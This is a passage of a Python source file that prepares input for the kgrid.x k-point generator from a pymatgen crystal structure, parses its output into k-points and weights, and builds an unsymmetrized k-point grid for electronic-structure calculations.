except Exception as E:
print(E)
# Parse the output
return get_kpoints(outputcontent)
def get_kgrid_input(structure, ngkpt, kshift=[.0,.0,.0], qshift=[.0,.0,.0],
fft=[0,0,0], use_tr=False, **kwargs):
"""Make a kgrid.x input, using pymatgen.Structure object."""
abc = np.array(structure.lattice.abc)
latt_vec_rel = (structure.lattice.matrix.transpose() / abc).transpose().round(12)
pos_cart_rel = np.dot(structure.frac_coords, latt_vec_rel).round(6)
S = ''
for arr in (ngkpt, kshift, qshift):
S += fortran_str(arr) + '\n'
S += '\n'
for arr in latt_vec_rel.tolist() + [structure.num_sites]:
S += fortran_str(arr) + '\n'
for Z, pos in zip(structure.atomic_numbers, pos_cart_rel):
S += str(Z) + ' ' + fortran_str(pos) + '\n'
for arr in (fft, use_tr):
S += fortran_str(arr) + '\n'
return S
def get_kpoints(content):
"""Read a list of kpoints and their weights from kgrid.x output file."""
lines = content.splitlines()[2:]
kpoints = list()
weights = list()
for line in lines:
k = [ float(ki) for ki in line.split()[:3] ]
w = float(line.split()[-1])
kpoints.append(k)
weights.append(w)
return kpoints, weights
def get_kqshift(ngkpt, kshift, qshift):
"""Add an absolute qshift to a relative kshift."""
kqshiftk = [ kshift[i] + qshift[i] * ngkpt[i] for i in range(3) ]
return kqshiftk
# ============================================================== #
def get_kpt_grid_nosym(ngkpt, kshift=[.0,.0,.0], qshift=[.0,.0,.0]):
"""
Return a list of kpoints generated without any symmetry,
along with their weights.
"""
ngkpt = np.array(ngkpt)
kshift = np.array(kshift)
qshift = np.array(qshift)
nkx, nky, nkz = ngkpt
kpoints = list()
weights = list()
#for ikx in range(-nkx, nkx):
# for iky in range(-nky, nky):
# for ikz in range(-nkz, nkz):
# k = (np.array([ikx, iky, ikz]) + kshift) / ngkpt * .5 + qshift
# kpoints.append(k)
# weights.append(1.)
for ikx in range(nkx):
for iky in range(nky):
for ikz in range(nkz):
k = (np.array([ikx, iky, ikz]) + kshift) / ngkpt + qshift
kpoints.append(k)
weights.append(1.)
return np.array(kpoints), np.array(weights)
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.